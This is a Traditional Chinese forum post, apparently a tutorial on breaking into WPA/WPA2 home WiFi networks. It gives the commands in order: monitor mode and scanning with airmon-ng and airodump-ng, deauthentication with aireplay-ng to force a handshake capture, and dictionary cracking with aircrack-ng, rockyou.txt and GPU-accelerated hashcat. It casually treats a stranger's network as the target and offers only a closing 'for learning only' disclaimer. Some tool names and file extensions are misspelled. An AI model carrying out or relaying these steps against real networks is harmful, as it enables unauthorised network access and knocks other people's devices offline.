現在，大部分家庭WiFi已普遍採用WPA/WPA2加密，相較於古老的WEB加密方式，安全性「相對」較高，但依舊存在安全漏洞，破解WiFi密碼的大致思路如下：

本文僅介紹透過抓取握手包的方式破解WPA/WPA2的密碼，用到的工具是Kali Linux自帶的airmon-ng ，以及地表最強密碼破解工具hashcat （可選）。

一、準備階段

1.在虛擬機器或實體機上安裝Kali Linux ，鏡像包下載、安裝文件詳見官網kali.org


Kali Linux官網

2.虛擬機器需要外接USB無線網卡，


三、掃描階段

開啟終端，（快速鍵Ctrl Alt T）；

1.輸入sudo su以啟用root帳戶；


2.輸入iwconfig ，查看網路設備；


3.輸入airmon-ng start wlan0將網路卡設定為監聽模式；


4.輸入airodunp-ng wlan0mon掃描周圍的WiFi訊號；


按Ctrl C停止掃描，選擇訊號較好的WiFi，準備破解。

四、抓包階段

1.輸入airodump-ng -w保存的握手包名字-c頻道--bssid要抓取路由器的MAC wlan0mon


2.輸入aireplay-ng -0 5 -a路由器的MAC -c要抓取握手包的設備的MAC wlan0mon ，這一步是踢下連接WiFi的設備，讓其重新連接，抓取其握手包！ （如果對方在打王者，突然WiFi莫名其妙斷了，多不好意思。所以-a後面跟5就夠了）；


3.輸入aircrack-ng -w抓取握手包名字.cap字典檔案.txt ，這一步是破解加密的握手包來獲取明文密碼，Kali Linux自帶字典，在/usr/share/wordlists/資料夾下面，這裡我們選用rockyou.txt ，將其複製到主目錄，解壓縮！然後稍等片刻，一般的密碼就可以破解；


已經抓取到握手包







4.輸入airmon-ng stop wlan0 ，將網路卡退出監聽模式，輸入破解出來的WiFi密碼，成功連接！ ！ ！

五、強加密破解後續

還有一種情況，密碼設定的較為複雜，這時候，我們需要用到另一個專業密碼破解工具：hashcat安裝方法如下：

git clone https://github.com/hashcat/hashcat.git的原始碼，不建議打包下載，容易編譯錯誤。





如果電腦有英偉達的獨顯，可以使用CUDA加速，需要事先安裝cuda，安裝方式詳見英偉達官網https://developer.nvidia.com/zh-cn/cuda-downloads

注意：這裡可以直接使用docker容器，如何pull run容器有興趣的話，自行查閱。


1.進入專案目錄，輸入make -j12 （j後跟的是執行緒數量，）進行編譯；


2.編譯完成以後，sudo make install安裝，


安裝完成以後，輸入hashcat -b進行基準測試。 （Ctrl c停止）。


2.首先將抓取到的WiFi握手包.cap文件轉成hashcat能夠破解的.haccpx文件，輸入aircrack-ng抓取握手包的名字.cap -j保存的哈希破解包名字，會在當前目錄得到一個.haccpx文件；


3.輸入hashcat -m 2500 -a 0保存的雜湊名字.hccapx 字典名字.txt ，即可極速破解！ （每秒可達10萬個）


這個使用CUDA下GPU的速度

（老黃：我家顯卡是讓你這樣用的？？？）


附錄：hashcat是一款很強大的密碼破解工具，不僅可以破解WiFi密碼，還可以破解電腦系統、壓縮包、文件等密碼，破解方式除字典破解以外，也有很多種。

六、寫在最後

雖然WPA/WPA2加密相較於WEB加密，安全性也有所提升。但10位數及以下的弱密碼，（字母數字的組合）即便在普通顯示卡的加持下，也能夠迅速破解！更別說用於深度學習，訓練模型用的GPU伺服器，Tesla專業卡。

如圖幾十個GB的字典幾乎涵蓋大部分弱密


最後！特別聲明：本文僅供學習，非法使用，後果自負！ ！ ！勿以惡小而為之，法網恢恢，疏失！

[zzz 在  2026-6-8 08:55 PM 作了最後編輯]